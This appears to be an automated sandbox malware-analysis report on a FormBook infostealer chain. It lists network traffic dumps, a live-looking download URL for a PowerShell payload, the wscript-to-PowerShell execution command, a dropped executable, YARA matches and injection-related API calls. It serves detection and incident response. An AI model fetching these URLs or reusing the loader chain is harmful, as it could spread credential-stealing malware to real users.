                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 07:09:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5TEwiwFS9jLW0Q35twxGeGdX1IXFEAGMLwoZFqSWvbA7Udl2j1uI3JliBnNdYpEVBeTHspsKURf9o%2Bzj7OuLh2WZlmTDQri65bPOX1ce1%2F%2BR97TJuTeery1gkAr5fyrJt%2BbEiAy25ahYZ4w%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913c308d7f100f47-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1529&min_rtt=1529&rtt_var=764&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=834&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 30 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a 59 97 a3 4a 72 7e bf bf 42 ae 39 b6 67 0e 5d cd be d5 ad 6a 1b 10 12 48 02 01 12 92 d0 cb 3d 09 24 8b 58 c5 2e f9 cc 0f f2 df f0 2f f3 51 55 2f d5 55 52 77 df 19 3f 38 1f 4a 64 66 44 64 64 2c 5f 50 99 fc f6 db 6f 8f ff 32 5e 4a 6b c7 90 47 51 93 a5 9f 7e 7b 7c f9 19 8d 46 a3 c7 08 02 ff f3 63 06 1b 30 8a 9a a6 bc 87 c7 36 ee 9e ee a4 22 6f 60 de dc 37 a7 12 de 8d bc 97 de d3 5d 03 87 06 bd 88 f8 7d e4 45 a0 aa 61 f3 d4 36 c1 3d 77 77 53 0e f0 22 78 7f e1 af 8a f4 95 a0 bc b8 f7 2e 53 37 19 8d 0a 84 19 f8 33 1c f2 50 c6 15 ac 5f b1 60 df d1 e6 20 83 4f 77 5d 0c fb b2 a8 9a 57 64 7d ec 37 d1 93 0f bb d8 83 f7 cf 9d 0f a3 38 8f 9b 18 a4 f7 b5 07 52 f8 84 7f fc 2a aa 89 9b 14 7e a2 30 6a a4 17 cd 68 52 b4 b9 ff 88 be 0c be 10 d4 cd 29 85 a3 8b dd 3e 9b cb ab eb cf cc 97 e6 16 fe 69 f4 5f 5f bb 97 16 14 79 73 1f 80 2c 4e 4f 0f 23 a1 8a 41 fa 61 a4 c0 b4 83 4d ec 81 0f a3 1a e4 f5 7d 0d ab 38 f8 fd 3d 5b 1d 9f e1 c3 08 a7 ca e1 fb c9 34 ce e1 7d 04 e3 30 6a 1e 46 f8 47 8a e0 68 16 Data Ascii: 1303ZYJr~B9g]jH=$X./QU/URw?8JdfDdd,_Po2^JkGQ~{|Fc06"o`7]}Ea6=wwS"x.S73P_` Ow]Wd}78R*~0jhR)>i__ys,NO#AaM}8=[4}0jFGh
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 07:09:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u3coZ%2F4233%2FVecI153Ay694mczKIS5ollP4c%2FKWzTzWqZhA5X5q%2BDtD5yoOfkDJfSrA8gYPA0qjSrIuY%2FvsW8716VMbSPHmk%2B1PeP1L01G5rodbZIIvXlDBz74GsKGEKasJaykNCObgtm0w%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913c30ad6ab58c30-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=2028&rtt_var=1014&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1871&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e2 e2 e2 02 00 00 00 ff ff 0d 0a Data Ascii: 13
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 07:09:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ny3aTbonpW6CIcNYggui1qW4LOZssbRNRRvaUJuMcRUXUeRuBkPG7cvktG9wILYGMjD7P0Dh9Qp8ZDBrCFOWoorRxAAXxzqPq%2F22jTQr2oeJvSnMS7MTkLcnk59hDe%2B%2FDDonKyU5em3D6PY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913c30be6a504405-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2339&min_rtt=2339&rtt_var=1169&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=568&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 07:09:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yGzNhkzZUfvqFfNvqT043G0Vut8XrzuVSoVRSJycGqXaJgx7w2ohBkW1KqqC9o1Q5ARwSkDXg6tpXDEMed9thyI%2FZMcdo6kzcYLD9HHp8gqBOpOuBqsymX%2B8ZERJGTuYVeMuucwqss0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913c30e2aa234321-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1587&rtt_var=793&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=825&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 07:09:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HslCj8qyHvn3hSjXL6iLukQlaoNWdRcXt6taex1wfriiSD1pSRTMsc1vRLTOyhAd7SsPTTrGCssE4YZKkOsHG5oWNn5hDs8uxD40Ui9kO3NUvvR6Bh2z4wpJpH%2FqEgrko4ZUyxPb3hY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913c30f2bc0e1a17-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1886&min_rtt=1886&rtt_var=943&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=849&delivery_rate=0&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 07:09:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fSaeqNG%2FzmiYXqInkSioUHvH%2BkdZBBqXxiz5QTJDgKkBFLt0aI5qOwOxI0VfKxHtPVmbe5KKix679yR09bGIUQaYnNO23IqLXzoFRua8seSt1V0UnRcVv6uEpzXWYC2NXXy8wxLTeik%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913c3103bc428c8f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2007&min_rtt=2007&rtt_var=1003&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1862&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 07:09:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AwtyrTi%2FDXDnBe%2FfbwPUn7PmPhT8b0%2FYF77Qi8i1Da4UQ%2BhFVweyVC5m5R3uh2z1gLThZMbHpdku9UgxbP92kyjdImnxxB1hhL4ka%2BybmfGjFPSiDh2PhdzXaHA%2FzEzD0gw2g1StZM8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913c3113de697289-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1901&min_rtt=1901&rtt_var=950&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=565&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>0
                Source: wscript.exe, 00000000.00000003.2358860232.0000026AAEC28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2267103251.0000026AAEBDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2358324521.0000026AACD08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2364092835.0000026AACD10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2365846996.0000026AAF38E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2364340807.0000026AACF15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2361660568.0000026AAED05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2360674436.0000026AACD0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2265166221.0000026AAEBE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2237030129.0000026AAEBE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://196.251.92.64/crypt/laser.ps1
                Source: wscript.exe, 00000000.00000002.2365846996.0000026AAF38E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://196.251.92.64/crypt/laser.ps1A
                Source: wscript.exe, 00000000.00000003.2269852187.0000026AAEBE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2359834204.0000026AAEBE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://196.251.92.6p
                Source: runonce.exe, 0000000A.00000002.3428238194.00000000058D8000.00000004.10000000.00040000.00000000.sdmp, tgV1MsdzZ4.exe, 0000000B.00000002.3426565846.0000000002D88000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: powershell.exe, 00000003.00000002.2349303803.0000026FEB795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft0
                Source: powershell.exe, 00000003.00000002.2302186412.0000026F8176C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2335684319.0000026F90079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000003.00000002.2302186412.0000026F815F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000003.00000002.2302186412.0000026F80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000003.00000002.2302186412.0000026F81205000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 00000003.00000002.2302186412.0000026F815F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: tgV1MsdzZ4.exe, 0000000B.00000002.3428450739.0000000004B22000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lucynoel6465.shop
                Source: tgV1MsdzZ4.exe, 0000000B.00000002.3428450739.0000000004B22000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lucynoel6465.shop/jgkl/
                Source: runonce.exe, 0000000A.00000003.2961708637.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powershell.exe, 00000003.00000002.2302186412.0000026F80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: runonce.exe, 0000000A.00000003.2961708637.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: runonce.exe, 0000000A.00000003.2961708637.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: runonce.exe, 0000000A.00000003.2961708637.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: powershell.exe, 00000003.00000002.2335684319.0000026F90079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000003.00000002.2335684319.0000026F90079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000003.00000002.2335684319.0000026F90079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: runonce.exe, 0000000A.00000003.2961708637.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: runonce.exe, 0000000A.00000003.2961708637.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: runonce.exe, 0000000A.00000003.2961708637.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: powershell.exe, 00000003.00000002.2302186412.0000026F815F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000003.00000002.2350865881.0000026FED4DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.m
                Source: powershell.exe, 00000003.00000002.2350865881.0000026FED4DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.mi
                Source: powershell.exe, 00000003.00000002.2350865881.0000026FED4DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsof
                Source: wscript.exe, 00000000.00000002.2365846996.0000026AAF38E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                Source: runonce.exe, 0000000A.00000002.3424407770.0000000002FB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: runonce.exe, 0000000A.00000002.3424407770.0000000002FB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: runonce.exe, 0000000A.00000003.2956006512.0000000007CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: runonce.exe, 0000000A.00000002.3424407770.0000000002FB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
                Source: runonce.exe, 0000000A.00000002.3424407770.0000000002FB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: runonce.exe, 0000000A.00000002.3424407770.0000000002FB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: runonce.exe, 0000000A.00000002.3424407770.0000000002FB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: runonce.exe, 0000000A.00000002.3424407770.0000000002FB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: runonce.exe, 0000000A.00000002.3424407770.0000000002FB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: powershell.exe, 00000003.00000002.2302186412.0000026F8176C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2335684319.0000026F90079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000003.00000002.2302186412.0000026F81205000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                Source: powershell.exe, 00000003.00000002.2302186412.0000026F81205000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                Source: runonce.exe, 0000000A.00000003.2961708637.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: runonce.exe, 0000000A.00000003.2961708637.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: tgV1MsdzZ4.exe, 0000000B.00000002.3426565846.0000000002BF6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.seasay.xyz/c9ts/?cf2hYv=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAy
                Source: runonce.exe, 0000000A.00000002.3428238194.00000000055B4000.00000004.10000000.00040000.00000000.sdmp, tgV1MsdzZ4.exe, 0000000B.00000002.3426565846.0000000002A64000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3074572069.000000000CAF4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=86884/vhr7/
                Source: runonce.exe, 0000000A.00000002.3428238194.00000000055B4000.00000004.10000000.00040000.00000000.sdmp, tgV1MsdzZ4.exe, 0000000B.00000002.3426565846.0000000002A64000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3074572069.000000000CAF4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3423391595.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3424044771.0000000000DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3424239645.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2774125614.0000000005670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3426268261.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2768044762.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2770300922.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: Process Memory Space: powershell.exe PID: 6440, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Powershell drops PE file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042CAA3 NtClose,7_2_0042CAA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B935C0 NtCreateMutant,LdrInitializeThunk,7_2_02B935C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92B60 NtClose,LdrInitializeThunk,7_2_02B92B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02B92C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02B92DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B94340 NtSetContextThread,7_2_02B94340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B93090 NtSetValueKey,7_2_02B93090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B93010 NtOpenDirectoryObject,7_2_02B93010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B94650 NtSuspendThread,7_2_02B94650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92AB0 NtWaitForSingleObject,7_2_02B92AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92AF0 NtWriteFile,7_2_02B92AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92AD0 NtReadFile,7_2_02B92AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92BA0 NtEnumerateValueKey,7_2_02B92BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92B80 NtQueryInformationFile,7_2_02B92B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92BF0 NtAllocateVirtualMemory,7_2_02B92BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92BE0 NtQueryValueKey,7_2_02B92BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B939B0 NtGetContextThread,7_2_02B939B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92EA0 NtAdjustPrivilegesToken,7_2_02B92EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92E80 NtReadVirtualMemory,7_2_02B92E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92EE0 NtQueueApcThread,7_2_02B92EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92E30 NtWriteVirtualMemory,7_2_02B92E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92FB0 NtResumeThread,7_2_02B92FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92FA0 NtQuerySection,7_2_02B92FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92F90 NtProtectVirtualMemory,7_2_02B92F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92FE0 NtCreateFile,7_2_02B92FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92F30 NtCreateSection,7_2_02B92F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92F60 NtCreateProcessEx,7_2_02B92F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92CA0 NtQueryInformationToken,7_2_02B92CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B92CF0 NtOpenProcess,7_2_02B92CF0
